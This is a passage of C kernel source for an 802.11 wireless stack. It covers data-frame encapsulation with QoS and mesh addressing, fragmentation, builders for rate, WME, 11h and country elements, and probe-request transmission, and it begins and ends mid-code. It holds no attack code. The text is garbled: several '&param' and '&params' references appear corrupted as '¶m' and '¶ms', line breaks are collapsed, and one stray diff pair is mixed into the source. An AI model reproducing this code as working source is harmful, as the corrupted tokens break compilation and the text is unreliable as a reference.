sending a unicast frame. * If a unicast key is set we use that. When no unicast key is set * we fall back to the default transmit key. */ static __inline struct ieee80211_key * ieee80211_crypto_getucastkey(struct ieee80211vap *vap, struct ieee80211_node *ni) { if (IEEE80211_KEY_UNDEFINED(&ni->ni_ucastkey)) { if (vap->iv_def_txkey == IEEE80211_KEYIX_NONE || IEEE80211_KEY_UNDEFINED(&vap->iv_nw_keys[vap->iv_def_txkey])) return NULL; return &vap->iv_nw_keys[vap->iv_def_txkey]; } else { return &ni->ni_ucastkey; } } /* * Return the transmit key to use in sending a multicast frame. * Multicast traffic always uses the group key which is installed as * the default tx key. */ static __inline struct ieee80211_key * ieee80211_crypto_getmcastkey(struct ieee80211vap *vap, struct ieee80211_node *ni) { if (vap->iv_def_txkey == IEEE80211_KEYIX_NONE || IEEE80211_KEY_UNDEFINED(&vap->iv_nw_keys[vap->iv_def_txkey])) return NULL; return &vap->iv_nw_keys[vap->iv_def_txkey]; } /* * Encapsulate an outbound data frame. The mbuf chain is updated. * If an error is encountered NULL is returned. The caller is required * to provide a node reference and pullup the ethernet header in the * first mbuf. * * NB: Packet is assumed to be processed by ieee80211_classify which * marked EAPOL frames w/ M_EAPOL. */ struct mbuf * ieee80211_encap(struct ieee80211vap *vap, struct ieee80211_node *ni, struct mbuf *m) { #define WH4(wh) ((struct ieee80211_frame_addr4 *)(wh)) #define MC01(mc) ((struct ieee80211_meshcntl_ae01 *)mc) struct ieee80211com *ic = ni->ni_ic; #ifdef IEEE80211_SUPPORT_MESH struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_meshcntl_ae10 *mc; struct ieee80211_mesh_route *rt = NULL; int dir = -1; #endif struct ether_header eh; struct ieee80211_frame *wh; struct ieee80211_key *key; struct llc *llc; int hdrsize, hdrspace, datalen, addqos, txfrag, is4addr; ieee80211_seq seqno; int meshhdrsize, meshae; uint8_t *qos; IEEE80211_TX_LOCK_ASSERT(ic); /* * Copy existing Ethernet header to a safe place. The * rest of the code assumes it's ok to strip it when * reorganizing state for the final encapsulation. */ KASSERT(m->m_len >= sizeof(eh), ("no ethernet header!")); ETHER_HEADER_COPY(&eh, mtod(m, caddr_t)); /* * Insure space for additional headers. First identify * transmit key to use in calculating any buffer adjustments * required. This is also used below to do privacy * encapsulation work. Then calculate the 802.11 header * size and any padding required by the driver. * * Note key may be NULL if we fall back to the default * transmit key and that is not set. In that case the * buffer may not be expanded as needed by the cipher * routines, but they will/should discard it. */ if (vap->iv_flags & IEEE80211_F_PRIVACY) { if (vap->iv_opmode == IEEE80211_M_STA || !IEEE80211_IS_MULTICAST(eh.ether_dhost) || (vap->iv_opmode == IEEE80211_M_WDS && (vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY))) key = ieee80211_crypto_getucastkey(vap, ni); else key = ieee80211_crypto_getmcastkey(vap, ni); if (key == NULL && (m->m_flags & M_EAPOL) == 0) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_CRYPTO, eh.ether_dhost, "no default transmit key (%s) deftxkey %u", __func__, vap->iv_def_txkey); vap->iv_stats.is_tx_nodefkey++; goto bad; } } else key = NULL; /* * XXX Some ap's don't handle QoS-encapsulated EAPOL * frames so suppress use. This may be an issue if other * ap's require all data frames to be QoS-encapsulated * once negotiated in which case we'll need to make this * configurable. * NB: mesh data frames are QoS. */ addqos = ((ni->ni_flags & (IEEE80211_NODE_QOS|IEEE80211_NODE_HT)) || (vap->iv_opmode == IEEE80211_M_MBSS)) && (m->m_flags & M_EAPOL) == 0; if (addqos) hdrsize = sizeof(struct ieee80211_qosframe); else hdrsize = sizeof(struct ieee80211_frame); #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) { /* * Mesh data frames are encapsulated according to the * rules of Section 11B.8.5 (p.139 of D3.0 spec). * o Group Addressed data (aka multicast) originating * at the local sta are sent w/ 3-address format and * address extension mode 00 * o Individually Addressed data (aka unicast) originating * at the local sta are sent w/ 4-address format and * address extension mode 00 * o Group Addressed data forwarded from a non-mesh sta are * sent w/ 3-address format and address extension mode 01 * o Individually Address data from another sta are sent * w/ 4-address format and address extension mode 10 */ is4addr = 0; /* NB: don't use, disable */ if (!IEEE80211_IS_MULTICAST(eh.ether_dhost)) { rt = ieee80211_mesh_rt_find(vap, eh.ether_dhost); KASSERT(rt != NULL, ("route is NULL")); dir = IEEE80211_FC1_DIR_DSTODS; hdrsize += IEEE80211_ADDR_LEN; if (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY) { if (IEEE80211_ADDR_EQ(rt->rt_mesh_gate, vap->iv_myaddr)) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, eh.ether_dhost, "%s", "trying to send to ourself"); goto bad; } meshae = IEEE80211_MESH_AE_10; meshhdrsize = sizeof(struct ieee80211_meshcntl_ae10); } else { meshae = IEEE80211_MESH_AE_00; meshhdrsize = sizeof(struct ieee80211_meshcntl); } } else { dir = IEEE80211_FC1_DIR_FROMDS; if (!IEEE80211_ADDR_EQ(eh.ether_shost, vap->iv_myaddr)) { /* proxy group */ meshae = IEEE80211_MESH_AE_01; meshhdrsize = sizeof(struct ieee80211_meshcntl_ae01); } else { /* group */ meshae = IEEE80211_MESH_AE_00; meshhdrsize = sizeof(struct ieee80211_meshcntl); } } } else { #endif /* * 4-address frames need to be generated for: * o packets sent through a WDS vap (IEEE80211_M_WDS) * o packets sent through a vap marked for relaying * (e.g. a station operating with dynamic WDS) */ is4addr = vap->iv_opmode == IEEE80211_M_WDS || ((vap->iv_flags_ext & IEEE80211_FEXT_4ADDR) && !IEEE80211_ADDR_EQ(eh.ether_shost, vap->iv_myaddr)); if (is4addr) hdrsize += IEEE80211_ADDR_LEN; meshhdrsize = meshae = 0; #ifdef IEEE80211_SUPPORT_MESH } #endif /* * Honor driver DATAPAD requirement. */ if (ic->ic_flags & IEEE80211_F_DATAPAD) hdrspace = roundup(hdrsize, sizeof(uint32_t)); else hdrspace = hdrsize; if (__predict_true((m->m_flags & M_FF) == 0)) { /* * Normal frame. */ m = ieee80211_mbuf_adjust(vap, hdrspace + meshhdrsize, key, m); if (m == NULL) { /* NB: ieee80211_mbuf_adjust handles msgs+statistics */ goto bad; } /* NB: this could be optimized 'cuz of ieee80211_mbuf_adjust */ m_adj(m, sizeof(struct ether_header) - sizeof(struct llc)); llc = mtod(m, struct llc *); llc->llc_dsap = llc->llc_ssap = LLC_SNAP_LSAP; llc->llc_control = LLC_UI; llc->llc_snap.org_code[0] = 0; llc->llc_snap.org_code[1] = 0; llc->llc_snap.org_code[2] = 0; llc->llc_snap.ether_type = eh.ether_type; } else { #ifdef IEEE80211_SUPPORT_SUPERG /* * Aggregated frame. */ m = ieee80211_ff_encap(vap, m, hdrspace + meshhdrsize, key); if (m == NULL) #endif goto bad; } datalen = m->m_pkthdr.len; /* NB: w/o 802.11 header */ M_PREPEND(m, hdrspace + meshhdrsize, M_NOWAIT); if (m == NULL) { vap->iv_stats.is_tx_nobuf++; goto bad; } wh = mtod(m, struct ieee80211_frame *); wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_DATA; *(uint16_t *)wh->i_dur = 0; qos = NULL; /* NB: quiet compiler */ if (is4addr) { wh->i_fc[1] = IEEE80211_FC1_DIR_DSTODS; IEEE80211_ADDR_COPY(wh->i_addr1, ni->ni_macaddr); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, eh.ether_dhost); IEEE80211_ADDR_COPY(WH4(wh)->i_addr4, eh.ether_shost); } else switch (vap->iv_opmode) { case IEEE80211_M_STA: wh->i_fc[1] = IEEE80211_FC1_DIR_TODS; IEEE80211_ADDR_COPY(wh->i_addr1, ni->ni_bssid); IEEE80211_ADDR_COPY(wh->i_addr2, eh.ether_shost); IEEE80211_ADDR_COPY(wh->i_addr3, eh.ether_dhost); break; case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; IEEE80211_ADDR_COPY(wh->i_addr1, eh.ether_dhost); IEEE80211_ADDR_COPY(wh->i_addr2, eh.ether_shost); /* * NB: always use the bssid from iv_bss as the * neighbor's may be stale after an ibss merge */ IEEE80211_ADDR_COPY(wh->i_addr3, vap->iv_bss->ni_bssid); break; case IEEE80211_M_HOSTAP: wh->i_fc[1] = IEEE80211_FC1_DIR_FROMDS; IEEE80211_ADDR_COPY(wh->i_addr1, eh.ether_dhost); IEEE80211_ADDR_COPY(wh->i_addr2, ni->ni_bssid); IEEE80211_ADDR_COPY(wh->i_addr3, eh.ether_shost); break; #ifdef IEEE80211_SUPPORT_MESH case IEEE80211_M_MBSS: /* NB: offset by hdrspace to deal with DATAPAD */ mc = (struct ieee80211_meshcntl_ae10 *) (mtod(m, uint8_t *) + hdrspace); wh->i_fc[1] = dir; switch (meshae) { case IEEE80211_MESH_AE_00: /* no proxy */ mc->mc_flags = 0; if (dir == IEEE80211_FC1_DIR_DSTODS) { /* ucast */ IEEE80211_ADDR_COPY(wh->i_addr1, ni->ni_macaddr); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, eh.ether_dhost); IEEE80211_ADDR_COPY(WH4(wh)->i_addr4, eh.ether_shost); qos =((struct ieee80211_qosframe_addr4 *) wh)->i_qos; } else if (dir == IEEE80211_FC1_DIR_FROMDS) { /* mcast */ IEEE80211_ADDR_COPY(wh->i_addr1, eh.ether_dhost); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, eh.ether_shost); qos = ((struct ieee80211_qosframe *) wh)->i_qos; } break; case IEEE80211_MESH_AE_01: /* mcast, proxy */ wh->i_fc[1] = IEEE80211_FC1_DIR_FROMDS; IEEE80211_ADDR_COPY(wh->i_addr1, eh.ether_dhost); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, vap->iv_myaddr); mc->mc_flags = 1; IEEE80211_ADDR_COPY(MC01(mc)->mc_addr4, eh.ether_shost); qos = ((struct ieee80211_qosframe *) wh)->i_qos; break; case IEEE80211_MESH_AE_10: /* ucast, proxy */ KASSERT(rt != NULL, ("route is NULL")); IEEE80211_ADDR_COPY(wh->i_addr1, rt->rt_nexthop); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, rt->rt_mesh_gate); IEEE80211_ADDR_COPY(WH4(wh)->i_addr4, vap->iv_myaddr); mc->mc_flags = IEEE80211_MESH_AE_10; IEEE80211_ADDR_COPY(mc->mc_addr5, eh.ether_dhost); IEEE80211_ADDR_COPY(mc->mc_addr6, eh.ether_shost); qos = ((struct ieee80211_qosframe_addr4 *) wh)->i_qos; break; default: KASSERT(0, ("meshae %d", meshae)); break; } mc->mc_ttl = ms->ms_ttl; ms->ms_seq++; LE_WRITE_4(mc->mc_seq, ms->ms_seq); break; #endif case IEEE80211_M_WDS: /* NB: is4addr should always be true */ default: goto bad; } if (m->m_flags & M_MORE_DATA) wh->i_fc[1] |= IEEE80211_FC1_MORE_DATA; if (addqos) { int ac, tid; if (is4addr) { qos = ((struct ieee80211_qosframe_addr4 *) wh)->i_qos; /* NB: mesh case handled earlier */ } else if (vap->iv_opmode != IEEE80211_M_MBSS) qos = ((struct ieee80211_qosframe *) wh)->i_qos; ac = M_WME_GETAC(m); /* map from access class/queue to 11e header priorty value */ tid = WME_AC_TO_TID(ac); qos[0] = tid & IEEE80211_QOS_TID; if (ic->ic_wme.wme_wmeChanParams.cap_wmeParams[ac].wmep_noackPolicy) qos[0] |= IEEE80211_QOS_ACKPOLICY_NOACK; #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) qos[1] = IEEE80211_QOS_MC; else #endif qos[1] = 0; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_QOS; if ((m->m_flags & M_AMPDU_MPDU) == 0) { /* * NB: don't assign a sequence # to potential * aggregates; we expect this happens at the * point the frame comes off any aggregation q * as otherwise we may introduce holes in the * BA sequence space and/or make window accouting * more difficult. * * XXX may want to control this with a driver * capability; this may also change when we pull * aggregation up into net80211 */ seqno = ni->ni_txseqs[tid]++; *(uint16_t *)wh->i_seq = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); M_SEQNO_SET(m, seqno); } } else { seqno = ni->ni_txseqs[IEEE80211_NONQOS_TID]++; *(uint16_t *)wh->i_seq = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); M_SEQNO_SET(m, seqno); } /* check if xmit fragmentation is required */ txfrag = (m->m_pkthdr.len > vap->iv_fragthreshold && !IEEE80211_IS_MULTICAST(wh->i_addr1) && (vap->iv_caps & IEEE80211_C_TXFRAG) && (m->m_flags & (M_FF | M_AMPDU_MPDU)) == 0); if (key != NULL) { /* * IEEE 802.1X: send EAPOL frames always in the clear. * WPA/WPA2: encrypt EAPOL keys when pairwise keys are set. */ if ((m->m_flags & M_EAPOL) == 0 || ((vap->iv_flags & IEEE80211_F_WPA) && (vap->iv_opmode == IEEE80211_M_STA ? !IEEE80211_KEY_UNDEFINED(key) : !IEEE80211_KEY_UNDEFINED(&ni->ni_ucastkey)))) { - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; if (!ieee80211_crypto_enmic(vap, key, m, txfrag)) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_OUTPUT, eh.ether_dhost, "%s", "enmic failed, discard frame"); vap->iv_stats.is_crypto_enmicfail++; goto bad; } } } if (txfrag && !ieee80211_fragment(vap, m, hdrsize, key != NULL ? key->wk_cipher->ic_header : 0, vap->iv_fragthreshold)) goto bad; m->m_flags |= M_ENCAP; /* mark encapsulated */ IEEE80211_NODE_STAT(ni, tx_data); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_NODE_STAT(ni, tx_mcast); m->m_flags |= M_MCAST; } else IEEE80211_NODE_STAT(ni, tx_ucast); IEEE80211_NODE_STAT_ADD(ni, tx_bytes, datalen); return m; bad: if (m != NULL) m_freem(m); return NULL; #undef WH4 #undef MC01 } /* * Fragment the frame according to the specified mtu. * The size of the 802.11 header (w/o padding) is provided * so we don't need to recalculate it. We create a new * mbuf for each fragment and chain it through m_nextpkt; * we might be able to optimize this by reusing the original * packet's mbufs but that is significantly more complicated. */ static int ieee80211_fragment(struct ieee80211vap *vap, struct mbuf *m0, u_int hdrsize, u_int ciphdrsize, u_int mtu) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_frame *wh, *whf; struct mbuf *m, *prev, *next; u_int totalhdrsize, fragno, fragsize, off, remainder, payload; u_int hdrspace; KASSERT(m0->m_nextpkt == NULL, ("mbuf already chained?")); KASSERT(m0->m_pkthdr.len > mtu, ("pktlen %u mtu %u", m0->m_pkthdr.len, mtu)); /* * Honor driver DATAPAD requirement. */ if (ic->ic_flags & IEEE80211_F_DATAPAD) hdrspace = roundup(hdrsize, sizeof(uint32_t)); else hdrspace = hdrsize; wh = mtod(m0, struct ieee80211_frame *); /* NB: mark the first frag; it will be propagated below */ wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; totalhdrsize = hdrspace + ciphdrsize; fragno = 1; off = mtu - ciphdrsize; remainder = m0->m_pkthdr.len - off; prev = m0; do { fragsize = totalhdrsize + remainder; if (fragsize > mtu) fragsize = mtu; /* XXX fragsize can be >2048! */ KASSERT(fragsize < MCLBYTES, ("fragment size %u too big!", fragsize)); if (fragsize > MHLEN) m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); else m = m_gethdr(M_NOWAIT, MT_DATA); if (m == NULL) goto bad; /* leave room to prepend any cipher header */ m_align(m, fragsize - ciphdrsize); /* * Form the header in the fragment. Note that since * we mark the first fragment with the MORE_FRAG bit * it automatically is propagated to each fragment; we * need only clear it on the last fragment (done below). * NB: frag 1+ dont have Mesh Control field present. */ whf = mtod(m, struct ieee80211_frame *); memcpy(whf, wh, hdrsize); #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) { if (IEEE80211_IS_DSTODS(wh)) ((struct ieee80211_qosframe_addr4 *) whf)->i_qos[1] &= ~IEEE80211_QOS_MC; else ((struct ieee80211_qosframe *) whf)->i_qos[1] &= ~IEEE80211_QOS_MC; } #endif *(uint16_t *)&whf->i_seq[0] |= htole16( (fragno & IEEE80211_SEQ_FRAG_MASK) << IEEE80211_SEQ_FRAG_SHIFT); fragno++; payload = fragsize - totalhdrsize; /* NB: destination is known to be contiguous */ m_copydata(m0, off, payload, mtod(m, uint8_t *) + hdrspace); m->m_len = hdrspace + payload; m->m_pkthdr.len = hdrspace + payload; m->m_flags |= M_FRAG; /* chain up the fragment */ prev->m_nextpkt = m; prev = m; /* deduct fragment just formed */ remainder -= payload; off += payload; } while (remainder != 0); /* set the last fragment */ m->m_flags |= M_LASTFRAG; whf->i_fc[1] &= ~IEEE80211_FC1_MORE_FRAG; /* strip first mbuf now that everything has been copied */ m_adj(m0, -(m0->m_pkthdr.len - (mtu - ciphdrsize))); m0->m_flags |= M_FIRSTFRAG | M_FRAG; vap->iv_stats.is_tx_fragframes++; vap->iv_stats.is_tx_frags += fragno-1; return 1; bad: /* reclaim fragments but leave original frame for caller to free */ for (m = m0->m_nextpkt; m != NULL; m = next) { next = m->m_nextpkt; m->m_nextpkt = NULL; /* XXX paranoid */ m_freem(m); } m0->m_nextpkt = NULL; return 0; } /* * Add a supported rates element id to a frame. */ uint8_t * ieee80211_add_rates(uint8_t *frm, const struct ieee80211_rateset *rs) { int nrates; *frm++ = IEEE80211_ELEMID_RATES; nrates = rs->rs_nrates; if (nrates > IEEE80211_RATE_SIZE) nrates = IEEE80211_RATE_SIZE; *frm++ = nrates; memcpy(frm, rs->rs_rates, nrates); return frm + nrates; } /* * Add an extended supported rates element id to a frame. */ uint8_t * ieee80211_add_xrates(uint8_t *frm, const struct ieee80211_rateset *rs) { /* * Add an extended supported rates element if operating in 11g mode. */ if (rs->rs_nrates > IEEE80211_RATE_SIZE) { int nrates = rs->rs_nrates - IEEE80211_RATE_SIZE; *frm++ = IEEE80211_ELEMID_XRATES; *frm++ = nrates; memcpy(frm, rs->rs_rates + IEEE80211_RATE_SIZE, nrates); frm += nrates; } return frm; } /* * Add an ssid element to a frame. */ static uint8_t * ieee80211_add_ssid(uint8_t *frm, const uint8_t *ssid, u_int len) { *frm++ = IEEE80211_ELEMID_SSID; *frm++ = len; memcpy(frm, ssid, len); return frm + len; } /* * Add an erp element to a frame. */ static uint8_t * ieee80211_add_erp(uint8_t *frm, struct ieee80211com *ic) { uint8_t erp; *frm++ = IEEE80211_ELEMID_ERP; *frm++ = 1; erp = 0; if (ic->ic_nonerpsta != 0) erp |= IEEE80211_ERP_NON_ERP_PRESENT; if (ic->ic_flags & IEEE80211_F_USEPROT) erp |= IEEE80211_ERP_USE_PROTECTION; if (ic->ic_flags & IEEE80211_F_USEBARKER) erp |= IEEE80211_ERP_LONG_PREAMBLE; *frm++ = erp; return frm; } /* * Add a CFParams element to a frame. */ static uint8_t * ieee80211_add_cfparms(uint8_t *frm, struct ieee80211com *ic) { #define ADDSHORT(frm, v) do { \ LE_WRITE_2(frm, v); \ frm += 2; \ } while (0) *frm++ = IEEE80211_ELEMID_CFPARMS; *frm++ = 6; *frm++ = 0; /* CFP count */ *frm++ = 2; /* CFP period */ ADDSHORT(frm, 0); /* CFP MaxDuration (TU) */ ADDSHORT(frm, 0); /* CFP CurRemaining (TU) */ return frm; #undef ADDSHORT } static __inline uint8_t * add_appie(uint8_t *frm, const struct ieee80211_appie *ie) { memcpy(frm, ie->ie_data, ie->ie_len); return frm + ie->ie_len; } static __inline uint8_t * add_ie(uint8_t *frm, const uint8_t *ie) { memcpy(frm, ie, 2 + ie[1]); return frm + 2 + ie[1]; } #define WME_OUI_BYTES 0x00, 0x50, 0xf2 /* * Add a WME information element to a frame. */ static uint8_t * ieee80211_add_wme_info(uint8_t *frm, struct ieee80211_wme_state *wme) { static const struct ieee80211_wme_info info = { .wme_id = IEEE80211_ELEMID_VENDOR, .wme_len = sizeof(struct ieee80211_wme_info) - 2, .wme_oui = { WME_OUI_BYTES }, .wme_type = WME_OUI_TYPE, .wme_subtype = WME_INFO_OUI_SUBTYPE, .wme_version = WME_VERSION, .wme_info = 0, }; memcpy(frm, &info, sizeof(info)); return frm + sizeof(info); } /* * Add a WME parameters element to a frame. */ static uint8_t * ieee80211_add_wme_param(uint8_t *frm, struct ieee80211_wme_state *wme) { #define SM(_v, _f) (((_v) << _f##_S) & _f) #define ADDSHORT(frm, v) do { \ LE_WRITE_2(frm, v); \ frm += 2; \ } while (0) /* NB: this works 'cuz a param has an info at the front */ static const struct ieee80211_wme_info param = { .wme_id = IEEE80211_ELEMID_VENDOR, .wme_len = sizeof(struct ieee80211_wme_param) - 2, .wme_oui = { WME_OUI_BYTES }, .wme_type = WME_OUI_TYPE, .wme_subtype = WME_PARAM_OUI_SUBTYPE, .wme_version = WME_VERSION, }; int i; memcpy(frm, ¶m, sizeof(param)); frm += __offsetof(struct ieee80211_wme_info, wme_info); *frm++ = wme->wme_bssChanParams.cap_info; /* AC info */ *frm++ = 0; /* reserved field */ for (i = 0; i < WME_NUM_AC; i++) { const struct wmeParams *ac = &wme->wme_bssChanParams.cap_wmeParams[i]; *frm++ = SM(i, WME_PARAM_ACI) | SM(ac->wmep_acm, WME_PARAM_ACM) | SM(ac->wmep_aifsn, WME_PARAM_AIFSN) ; *frm++ = SM(ac->wmep_logcwmax, WME_PARAM_LOGCWMAX) | SM(ac->wmep_logcwmin, WME_PARAM_LOGCWMIN) ; ADDSHORT(frm, ac->wmep_txopLimit); } return frm; #undef SM #undef ADDSHORT } #undef WME_OUI_BYTES /* * Add an 11h Power Constraint element to a frame. */ static uint8_t * ieee80211_add_powerconstraint(uint8_t *frm, struct ieee80211vap *vap) { const struct ieee80211_channel *c = vap->iv_bss->ni_chan; /* XXX per-vap tx power limit? */ int8_t limit = vap->iv_ic->ic_txpowlimit / 2; frm[0] = IEEE80211_ELEMID_PWRCNSTR; frm[1] = 1; frm[2] = c->ic_maxregpower > limit ? c->ic_maxregpower - limit : 0; return frm + 3; } /* * Add an 11h Power Capability element to a frame. */ static uint8_t * ieee80211_add_powercapability(uint8_t *frm, const struct ieee80211_channel *c) { frm[0] = IEEE80211_ELEMID_PWRCAP; frm[1] = 2; frm[2] = c->ic_minpower; frm[3] = c->ic_maxpower; return frm + 4; } /* * Add an 11h Supported Channels element to a frame. */ static uint8_t * ieee80211_add_supportedchannels(uint8_t *frm, struct ieee80211com *ic) { static const int ielen = 26; frm[0] = IEEE80211_ELEMID_SUPPCHAN; frm[1] = ielen; /* XXX not correct */ memcpy(frm+2, ic->ic_chan_avail, ielen); return frm + 2 + ielen; } /* * Add an 11h Quiet time element to a frame. */ static uint8_t * ieee80211_add_quiet(uint8_t *frm, struct ieee80211vap *vap) { struct ieee80211_quiet_ie *quiet = (struct ieee80211_quiet_ie *) frm; quiet->quiet_ie = IEEE80211_ELEMID_QUIET; quiet->len = 6; if (vap->iv_quiet_count_value == 1) vap->iv_quiet_count_value = vap->iv_quiet_count; else if (vap->iv_quiet_count_value > 1) vap->iv_quiet_count_value--; if (vap->iv_quiet_count_value == 0) { /* value 0 is reserved as per 802.11h standerd */ vap->iv_quiet_count_value = 1; } quiet->tbttcount = vap->iv_quiet_count_value; quiet->period = vap->iv_quiet_period; quiet->duration = htole16(vap->iv_quiet_duration); quiet->offset = htole16(vap->iv_quiet_offset); return frm + sizeof(*quiet); } /* * Add an 11h Channel Switch Announcement element to a frame. * Note that we use the per-vap CSA count to adjust the global * counter so we can use this routine to form probe response * frames and get the current count. */ static uint8_t * ieee80211_add_csa(uint8_t *frm, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_csa_ie *csa = (struct ieee80211_csa_ie *) frm; csa->csa_ie = IEEE80211_ELEMID_CSA; csa->csa_len = 3; csa->csa_mode = 1; /* XXX force quiet on channel */ csa->csa_newchan = ieee80211_chan2ieee(ic, ic->ic_csa_newchan); csa->csa_count = ic->ic_csa_count - vap->iv_csa_count; return frm + sizeof(*csa); } /* * Add an 11h country information element to a frame. */ static uint8_t * ieee80211_add_countryie(uint8_t *frm, struct ieee80211com *ic) { if (ic->ic_countryie == NULL || ic->ic_countryie_chan != ic->ic_bsschan) { /* * Handle lazy construction of ie. This is done on * first use and after a channel change that requires * re-calculation. */ if (ic->ic_countryie != NULL) free(ic->ic_countryie, M_80211_NODE_IE); ic->ic_countryie = ieee80211_alloc_countryie(ic); if (ic->ic_countryie == NULL) return frm; ic->ic_countryie_chan = ic->ic_bsschan; } return add_appie(frm, ic->ic_countryie); } uint8_t * ieee80211_add_wpa(uint8_t *frm, const struct ieee80211vap *vap) { if (vap->iv_flags & IEEE80211_F_WPA1 && vap->iv_wpa_ie != NULL) return (add_ie(frm, vap->iv_wpa_ie)); else { /* XXX else complain? */ return (frm); } } uint8_t * ieee80211_add_rsn(uint8_t *frm, const struct ieee80211vap *vap) { if (vap->iv_flags & IEEE80211_F_WPA2 && vap->iv_rsn_ie != NULL) return (add_ie(frm, vap->iv_rsn_ie)); else { /* XXX else complain? */ return (frm); } } uint8_t * ieee80211_add_qos(uint8_t *frm, const struct ieee80211_node *ni) { if (ni->ni_flags & IEEE80211_NODE_QOS) { *frm++ = IEEE80211_ELEMID_QOS; *frm++ = 1; *frm++ = 0; } return (frm); } /* * Send a probe request frame with the specified ssid * and any optional information element data. */ int ieee80211_send_probereq(struct ieee80211_node *ni, const uint8_t sa[IEEE80211_ADDR_LEN], const uint8_t da[IEEE80211_ADDR_LEN], const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t *ssid, size_t ssidlen) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; const struct ieee80211_txparam *tp; struct ieee80211_bpf_params params; struct ieee80211_frame *wh; const struct ieee80211_rateset *rs; struct mbuf *m; uint8_t *frm; int ret; if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_NOTE(vap, IEEE80211_MSG_OUTPUT, ni, "block %s frame in CAC state", "probe request"); vap->iv_stats.is_tx_badstate++; return EIO; /* XXX */ } /* * Hold a reference on the node so it doesn't go away until after * the xmit is complete all the way in the driver. On error we * will remove our reference. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); /* * prreq frame format * [tlv] ssid * [tlv] supported rates * [tlv] RSN (optional) * [tlv] extended supported rates * [tlv] WPA (optional) * [tlv] user-specified ie's */ m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), 2 + IEEE80211_NWID_LEN + 2 + IEEE80211_RATE_SIZE + sizeof(struct ieee80211_ie_wpa) + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + sizeof(struct ieee80211_ie_wpa) + (vap->iv_appie_probereq != NULL ? vap->iv_appie_probereq->ie_len : 0) ); if (m == NULL) { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } frm = ieee80211_add_ssid(frm, ssid, ssidlen); rs = ieee80211_get_suprates(ic, ic->ic_curchan); frm = ieee80211_add_rates(frm, rs); frm = ieee80211_add_rsn(frm, vap); frm = ieee80211_add_xrates(frm, rs); frm = ieee80211_add_wpa(frm, vap); if (vap->iv_appie_probereq != NULL) frm = add_appie(frm, vap->iv_appie_probereq); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); KASSERT(M_LEADINGSPACE(m) >= sizeof(struct ieee80211_frame), ("leading space %zd", M_LEADINGSPACE(m))); M_PREPEND(m, sizeof(struct ieee80211_frame), M_NOWAIT); if (m == NULL) { /* NB: cannot happen */ ieee80211_free_node(ni); return ENOMEM; } IEEE80211_TX_LOCK(ic); wh = mtod(m, struct ieee80211_frame *); ieee80211_send_setup(ni, m, IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_REQ, IEEE80211_NONQOS_TID, sa, da, bssid); /* XXX power management? */ m->m_flags |= M_ENCAP; /* mark encapsulated */ M_WME_SETAC(m, WME_AC_BE); IEEE80211_NODE_STAT(ni, tx_probereq); IEEE80211_NODE_STAT(ni, tx_mgmt); IEEE80211_DPRINTF(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_DUMPPKTS, "send probe req on channel %u bssid %s ssid \"%.*s\"\n", ieee80211_chan2ieee(ic, ic->ic_curchan), ether_sprintf(bssid), ssidlen, ssid); memset(¶ms, 0, sizeof(params)); params.ibp_pri = M_WME_GETAC(m); tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; params.ibp_rate0 = tp->mgmtrate; if (IEEE80211_IS_MULTICAST(da)) { params.ibp_flags |= IEEE80211_BPF_NOACK; params.ibp_try0 = 1; } else params.ibp_try0 = tp->maxretry; params.ibp_power = ni->ni_txpower; ret = ieee80211_raw_output(vap, ni, m, ¶ms); IEEE80211_TX_UNLOCK(ic); return (ret); } /* * Calculate capability information for mgt frames. */ uint16_t ieee80211_getcapinfo(struct ieee80211vap *vap, struct ieee80211_channel *chan) { struct ieee80211com *ic = vap->iv_ic; uint16_t capinfo; KASSERT(vap->iv_opmode != IEEE80211_M_STA, ("station mode")); if (vap->iv_opmode == 